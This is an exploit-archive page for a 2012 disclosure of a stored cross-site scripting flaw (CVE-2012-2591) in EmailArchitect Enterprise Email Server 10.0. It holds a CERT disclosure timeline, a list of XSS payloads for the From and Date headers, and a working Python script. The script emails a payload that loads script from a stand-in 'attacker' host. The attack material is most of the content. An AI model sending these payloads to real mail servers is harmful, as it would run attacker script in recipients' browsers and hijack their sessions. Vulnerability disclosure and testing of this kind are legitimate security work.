EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting: Posted Aug 8, 2012; Authored by loneferret; EmailArchitect Enterprise Email Server version 10.0 suffers from a stored cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2012-2591; SHA-256 | 1d614ed71a8927d8aefe626bbcff7dd35a56dc0ab018757a65f61785d9f38e5f; Download | Favorite | View

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

#!/usr/bin/python
 
'''
Author: loneferret of Offensive Security
Product: EmailArchitect Enterprise Email Server
Version: 10.0
Vendor Site: http://www.emailarchitect.net
Software Download Link: http://www.emailarchitect.net/webapp/download/easetup.exe
 
Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure
 
Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86), OS: MAC OS Lion
Browser Used: Internet Explorer 9, Firefox 12
 
Injection Point: From
Injection Payload(s):
1:  ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
 
Injection Point: Date
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
2: <SCRIPT>alert('XSS')</SCRIPT>
3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>
4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
6: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
7: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>
8: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>
 
'''
 
 
import smtplib, urllib2
 
payload = """<SCRIPT SRC=http://attacker/xss.js></SCRIPT>"""
 
def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = "From: hacker@offsec.local\n"
        msg += "To: victim@victim.local\n"
        msg += "Date: Today" + payload + "\r\n"
        msg += "Subject: XSS\n"
        msg += "Content-type: text/html\n\n"
        msg += "XSS.\r\n\r\n"
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()
 
username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"
 
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

Share This

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems